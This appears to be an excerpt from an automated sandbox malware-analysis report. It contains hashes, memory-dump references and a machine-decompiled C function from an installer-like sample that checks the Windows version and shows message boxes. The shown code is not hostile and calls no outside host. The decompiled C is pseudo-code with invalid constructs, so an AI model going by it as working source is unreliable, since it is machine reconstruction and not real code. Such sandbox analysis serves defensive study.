                                                                                                                                                                                                                                            • _lclose.KERNEL32(00000000), ref: 00322555
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                            • String ID: wininit.ini
                                                                                                                                                                                                                                            • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                            • Opcode ID: c9f94e86b525a23ac877895a9d6df98488c69aedbabb3ec0ab94768fb45cd4f1
                                                                                                                                                                                                                                            • Instruction ID: cb58c1102e2b50b43875d444c9cb63ae7fbb051cb83bc50df0c395ff4f2336e0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9f94e86b525a23ac877895a9d6df98488c69aedbabb3ec0ab94768fb45cd4f1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9501B5326015286BC7319B65AC0DEDFBB7CEF46760F004159FA49D3190DE748E46CA91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E003236EE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                            				signed int _v420;
                                                                                                                                                                                                                                            				signed int _v424;
                                                                                                                                                                                                                                            				CHAR* _v428;
                                                                                                                                                                                                                                            				CHAR* _v432;
                                                                                                                                                                                                                                            				signed int _v436;
                                                                                                                                                                                                                                            				CHAR* _v440;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                                                                                            				CHAR* _t77;
                                                                                                                                                                                                                                            				CHAR* _t91;
                                                                                                                                                                                                                                            				CHAR* _t94;
                                                                                                                                                                                                                                            				int _t97;
                                                                                                                                                                                                                                            				CHAR* _t98;
                                                                                                                                                                                                                                            				signed char _t99;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				signed short _t107;
                                                                                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                                                                                            				short _t113;
                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                            				signed char _t115;
                                                                                                                                                                                                                                            				short _t119;
                                                                                                                                                                                                                                            				CHAR* _t123;
                                                                                                                                                                                                                                            				CHAR* _t124;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                                                                                            				signed int _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				CHAR* _t138;
                                                                                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t72 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                            				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            				_t115 = __ecx;
                                                                                                                                                                                                                                            				_t135 = 0;
                                                                                                                                                                                                                                            				_v432 = __ecx;
                                                                                                                                                                                                                                            				_t138 = 0;
                                                                                                                                                                                                                                            				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                            					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                            					_t119 = 2;
                                                                                                                                                                                                                                            					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                            					__eflags = _t77;
                                                                                                                                                                                                                                            					if(_t77 == 0) {
                                                                                                                                                                                                                                            						_t119 = 0;
                                                                                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                                                                                            						 *0x328184 = 1;
                                                                                                                                                                                                                                            						 *0x328180 = 1;
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						 *0x329a40 = _t119;
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						__eflags =  *0x328a34 - _t138; // 0x0
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t115;
                                                                                                                                                                                                                                            						if(_t115 == 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v428 = _t135;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                            						_t11 =  &_v420;
                                                                                                                                                                                                                                            						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                            						__eflags =  *_t11;
                                                                                                                                                                                                                                            						_v440 = _t115;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                            							_v436 = E00322A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                            							_t91 = E00322A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                            							_t123 = _v436;
                                                                                                                                                                                                                                            							_t133 = 0x54d;
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 < 0) {
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								__eflags = _v420 - 1;
                                                                                                                                                                                                                                            								if(_v420 == 1) {
                                                                                                                                                                                                                                            									_t138 = 0x54c;
                                                                                                                                                                                                                                            									L36:
                                                                                                                                                                                                                                            									__eflags = _t138;
                                                                                                                                                                                                                                            									if(_t138 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            										if(_t138 == _t133) {
                                                                                                                                                                                                                                            											L30:
                                                                                                                                                                                                                                            											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                            											_t115 = 0;
                                                                                                                                                                                                                                            											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                            											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            											_t133 = _v432;
                                                                                                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                                                                                                            												_t124 = _v440;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                            												_v420 =  &_v268;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t124;
                                                                                                                                                                                                                                            											if(_t124 == 0) {
                                                                                                                                                                                                                                            												_t135 = _v436;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t99 = _t124[0x30];
                                                                                                                                                                                                                                            												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                            												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                            												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                            													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t115 = 0x104;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0x328a38 & 0x00000001;
                                                                                                                                                                                                                                            											if(( *0x328a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            												L64:
                                                                                                                                                                                                                                            												_push(0);
                                                                                                                                                                                                                                            												_push(0x30);
                                                                                                                                                                                                                                            												_push(_v420);
                                                                                                                                                                                                                                            												_push("cent");
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												__eflags = _t135;
                                                                                                                                                                                                                                            												if(_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												__eflags =  *_t135;
                                                                                                                                                                                                                                            												if( *_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												MessageBeep(0);
                                                                                                                                                                                                                                            												_t94 = E0032681F(_t115);
                                                                                                                                                                                                                                            												__eflags = _t94;
                                                                                                                                                                                                                                            												if(_t94 == 0) {
                                                                                                                                                                                                                                            													L57:
                                                                                                                                                                                                                                            													0x180030 = 0x30;
                                                                                                                                                                                                                                            													L58:
                                                                                                                                                                                                                                            													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                                                            													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                            													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                            														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                            														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            															goto L66;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														__eflags = _t97 - 1;
                                                                                                                                                                                                                                            														L62:
                                                                                                                                                                                                                                            														if(__eflags == 0) {
                                                                                                                                                                                                                                            															_t138 = 0;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L66;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													__eflags = _t97 - 6;
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t98 = E003267C9(_t124, _t124);
                                                                                                                                                                                                                                            												__eflags = _t98;
                                                                                                                                                                                                                                            												if(_t98 == 0) {
                                                                                                                                                                                                                                            													goto L57;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                            										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                            											goto L30;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138;
                                                                                                                                                                                                                                            										if(_t138 == 0) {
                                                                                                                                                                                                                                            											goto L66;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t135 = 0;
                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                            										goto L44;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L37:
                                                                                                                                                                                                                                            									_t129 = _v432;
                                                                                                                                                                                                                                            									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                            									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t133 =  &_v268;
                                                                                                                                                                                                                                            									_t104 = E003228E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                            									__eflags = _t104;
                                                                                                                                                                                                                                            									if(_t104 != 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t135 = _v428;
                                                                                                                                                                                                                                            									_t133 = 0x54d;
                                                                                                                                                                                                                                            									_t138 = 0x54d;
                                                                                                                                                                                                                                            									goto L40;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							if(_t91 > 0) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 != 0) {
                                                                                                                                                                                                                                            								__eflags = _t91;
                                                                                                                                                                                                                                            								if(_t91 != 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                            								L27:
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								L28:
                                                                                                                                                                                                                                            								__eflags = _t135;
                                                                                                                                                                                                                                            								if(_t135 == 0) {
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t138 = 0x54c;
                                                                                                                                                                                                                                            								goto L30;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                            							if(_t91 != 0) {
                                                                                                                                                                                                                                            								_t131 = _v424;
                                                                                                                                                                                                                                            								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                            								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                            							_t109 = _v424;
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                            							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                            							goto L27;
                                                                                                                                                                                                                                            							L33:
                                                                                                                                                                                                                                            							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                            							_v428 = _t135;
                                                                                                                                                                                                                                            							_v420 = _t135;
                                                                                                                                                                                                                                            							__eflags = _t135 - 2;
                                                                                                                                                                                                                                            						} while (_t135 < 2);
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t77 == 1;
                                                                                                                                                                                                                                            					if(_t77 == 1) {
                                                                                                                                                                                                                                            						 *0x329a40 = _t119;
                                                                                                                                                                                                                                            						 *0x328184 = 1;
                                                                                                                                                                                                                                            						 *0x328180 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - 3;
                                                                                                                                                                                                                                            						if(_t133 > 3) {
                                                                                                                                                                                                                                            							__eflags = _t133 - 5;
                                                                                                                                                                                                                                            							if(_t133 < 5) {
                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t113 = 3;
                                                                                                                                                                                                                                            							_t119 = _t113;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t119 = 1;
                                                                                                                                                                                                                                            						_t114 = 3;
                                                                                                                                                                                                                                            						 *0x329a40 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                            						if(__eflags < 0) {
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0x328184 = _t135;
                                                                                                                                                                                                                                            							 *0x328180 = _t135;
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                            						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t138 = 0x4ca;
                                                                                                                                                                                                                                            					goto L44;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t138 = 0x4b4;
                                                                                                                                                                                                                                            					L44:
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					L65:
                                                                                                                                                                                                                                            					_t133 = _t138;
                                                                                                                                                                                                                                            					E003244B9(0, _t138);
                                                                                                                                                                                                                                            					L66:
                                                                                                                                                                                                                                            					return E00326CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x003236f9
                                                                                                                                                                                                                                            0x00323700
                                                                                                                                                                                                                                            0x0032370c
                                                                                                                                                                                                                                            0x00323716
                                                                                                                                                                                                                                            0x00323718
                                                                                                                                                                                                                                            0x0032371b
                                                                                                                                                                                                                                            0x00323721
                                                                                                                                                                                                                                            0x0032372b
                                                                                                                                                                                                                                            0x0032373d
                                                                                                                                                                                                                                            0x00323745
                                                                                                                                                                                                                                            0x00323746
                                                                                                                                                                                                                                            0x00323746
                                                                                                                                                                                                                                            0x00323749
                                                                                                                                                                                                                                            0x003237ab
                                                                                                                                                                                                                                            0x003237ad
                                                                                                                                                                                                                                            0x003237ae
                                                                                                                                                                                                                                            0x003237b3
                                                                                                                                                                                                                                            0x003237b8
                                                                                                                                                                                                                                            0x003237b8
                                                                                                                                                                                                                                            0x003237bf
                                                                                                                                                                                                                                            0x003237bf
                                                                                                                                                                                                                                            0x003237c5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003237cb
                                                                                                                                                                                                                                            0x003237cd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003237d5
                                                                                                                                                                                                                                            0x003237db
                                                                                                                                                                                                                                            0x003237e8
                                                                                                                                                                                                                                            0x003237ea
                                                                                                                                                                                                                                            0x003237ea
                                                                                                                                                                                                                                            0x003237ea
                                                                                                                                                                                                                                            0x003237f0
                                                                                                                                                                                                                                            0x003237f6
                                                                                                                                                                                                                                            0x00323805
                                                                                                                                                                                                                                            0x00323817
                                                                                                                                                                                                                                            0x0032382b
                                                                                                                                                                                                                                            0x00323830
                                                                                                                                                                                                                                            0x00323836
                                                                                                                                                                                                                                            0x0032383b
                                                                                                                                                                                                                                            0x0032383d
                                                                                                                                                                                                                                            0x003238eb
                                                                                                                                                                                                                                            0x003238eb
                                                                                                                                                                                                                                            0x003238f2
                                                                                                                                                                                                                                            0x0032390c
                                                                                                                                                                                                                                            0x00323911
                                                                                                                                                                                                                                            0x00323911
                                                                                                                                                                                                                                            0x00323913
                                                                                                                                                                                                                                            0x0032394d
                                                                                                                                                                                                                                            0x0032394d
                                                                                                                                                                                                                                            0x0032394f
                                                                                                                                                                                                                                            0x003238a9
                                                                                                                                                                                                                                            0x003238a9
                                                                                                                                                                                                                                            0x003238b0
                                                                                                                                                                                                                                            0x003238b2
                                                                                                                                                                                                                                            0x003238b9
                                                                                                                                                                                                                                            0x003238bb
                                                                                                                                                                                                                                            0x003238c1
                                                                                                                                                                                                                                            0x00323975
                                                                                                                                                                                                                                            0x003238c7
                                                                                                                                                                                                                                            0x003238de
                                                                                                                                                                                                                                            0x003238e0
                                                                                                                                                                                                                                            0x003238e0
                                                                                                                                                                                                                                            0x0032397b
                                                                                                                                                                                                                                            0x0032397d
                                                                                                                                                                                                                                            0x003239a9
                                                                                                                                                                                                                                            0x0032397f
                                                                                                                                                                                                                                            0x00323982
                                                                                                                                                                                                                                            0x0032398b
                                                                                                                                                                                                                                            0x0032398d
                                                                                                                                                                                                                                            0x0032398f
                                                                                                                                                                                                                                            0x0032399f
                                                                                                                                                                                                                                            0x003239a1
                                                                                                                                                                                                                                            0x00323991
                                                                                                                                                                                                                                            0x00323991
                                                                                                                                                                                                                                            0x00323991
                                                                                                                                                                                                                                            0x0032398f
                                                                                                                                                                                                                                            0x003239af
                                                                                                                                                                                                                                            0x003239b6
                                                                                                                                                                                                                                            0x00323a0f
                                                                                                                                                                                                                                            0x00323a0f
                                                                                                                                                                                                                                            0x00323a11
                                                                                                                                                                                                                                            0x00323a13
                                                                                                                                                                                                                                            0x00323a19
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003239b8
                                                                                                                                                                                                                                            0x003239b8
                                                                                                                                                                                                                                            0x003239ba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003239bc
                                                                                                                                                                                                                                            0x003239bf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003239c3
                                                                                                                                                                                                                                            0x003239c9
                                                                                                                                                                                                                                            0x003239ce
                                                                                                                                                                                                                                            0x003239d0
                                                                                                                                                                                                                                            0x003239e3
                                                                                                                                                                                                                                            0x003239e5
                                                                                                                                                                                                                                            0x003239e6
                                                                                                                                                                                                                                            0x003239f1
                                                                                                                                                                                                                                            0x003239f7
                                                                                                                                                                                                                                            0x003239fa
                                                                                                                                                                                                                                            0x00323a01
                                                                                                                                                                                                                                            0x00323a04
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323a06
                                                                                                                                                                                                                                            0x00323a09
                                                                                                                                                                                                                                            0x00323a09
                                                                                                                                                                                                                                            0x00323a0b
                                                                                                                                                                                                                                            0x00323a0b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323a09
                                                                                                                                                                                                                                            0x003239fc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003239fc
                                                                                                                                                                                                                                            0x003239d3
                                                                                                                                                                                                                                            0x003239d8
                                                                                                                                                                                                                                            0x003239da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003239dc
                                                                                                                                                                                                                                            0x003239b6
                                                                                                                                                                                                                                            0x00323955
                                                                                                                                                                                                                                            0x0032395b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323961
                                                                                                                                                                                                                                            0x00323963
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323969
                                                                                                                                                                                                                                            0x00323969
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323969
                                                                                                                                                                                                                                            0x00323915
                                                                                                                                                                                                                                            0x00323915
                                                                                                                                                                                                                                            0x0032391b
                                                                                                                                                                                                                                            0x0032391f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032392d
                                                                                                                                                                                                                                            0x00323933
                                                                                                                                                                                                                                            0x00323938
                                                                                                                                                                                                                                            0x0032393a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323940
                                                                                                                                                                                                                                            0x00323946
                                                                                                                                                                                                                                            0x0032394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003238f2
                                                                                                                                                                                                                                            0x00323843
                                                                                                                                                                                                                                            0x00323845
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032384b
                                                                                                                                                                                                                                            0x0032384d
                                                                                                                                                                                                                                            0x00323883
                                                                                                                                                                                                                                            0x00323885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032389a
                                                                                                                                                                                                                                            0x0032389e
                                                                                                                                                                                                                                            0x0032389e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003238a0
                                                                                                                                                                                                                                            0x003238a0
                                                                                                                                                                                                                                            0x003238a2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003238a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003238a4
                                                                                                                                                                                                                                            0x0032384f
                                                                                                                                                                                                                                            0x00323851
                                                                                                                                                                                                                                            0x00323857
                                                                                                                                                                                                                                            0x0032386e
                                                                                                                                                                                                                                            0x00323877
                                                                                                                                                                                                                                            0x0032387b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323881
                                                                                                                                                                                                                                            0x00323859
                                                                                                                                                                                                                                            0x0032385c
                                                                                                                                                                                                                                            0x00323862
                                                                                                                                                                                                                                            0x00323866
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323868
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003238f4
                                                                                                                                                                                                                                            0x003238f4
                                                                                                                                                                                                                                            0x003238f5
                                                                                                                                                                                                                                            0x003238fb
                                                                                                                                                                                                                                            0x00323901
                                                                                                                                                                                                                                            0x00323901
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032390a
                                                                                                                                                                                                                                            0x0032374b
                                                                                                                                                                                                                                            0x0032374e
                                                                                                                                                                                                                                            0x0032375c
                                                                                                                                                                                                                                            0x00323764
                                                                                                                                                                                                                                            0x00323769
                                                                                                                                                                                                                                            0x0032376e
                                                                                                                                                                                                                                            0x00323771
                                                                                                                                                                                                                                            0x0032379c
                                                                                                                                                                                                                                            0x0032379f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003237a3
                                                                                                                                                                                                                                            0x003237a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003237a4
                                                                                                                                                                                                                                            0x00323773
                                                                                                                                                                                                                                            0x00323777
                                                                                                                                                                                                                                            0x00323778
                                                                                                                                                                                                                                            0x0032377f
                                                                                                                                                                                                                                            0x00323781
                                                                                                                                                                                                                                            0x0032378e
                                                                                                                                                                                                                                            0x0032378e
                                                                                                                                                                                                                                            0x00323794
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323794
                                                                                                                                                                                                                                            0x00323783
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323785
                                                                                                                                                                                                                                            0x0032378c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032378c
                                                                                                                                                                                                                                            0x00323750
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032372d
                                                                                                                                                                                                                                            0x0032372d
                                                                                                                                                                                                                                            0x0032396b
                                                                                                                                                                                                                                            0x0032396b
                                                                                                                                                                                                                                            0x0032396c
                                                                                                                                                                                                                                            0x0032396e
                                                                                                                                                                                                                                            0x0032396f
                                                                                                                                                                                                                                            0x00323a1e
                                                                                                                                                                                                                                            0x00323a1e
                                                                                                                                                                                                                                            0x00323a22
                                                                                                                                                                                                                                            0x00323a27
                                                                                                                                                                                                                                            0x00323a3e
                                                                                                                                                                                                                                            0x00323a3e

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00323723
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 003239C3
                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 003239F1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
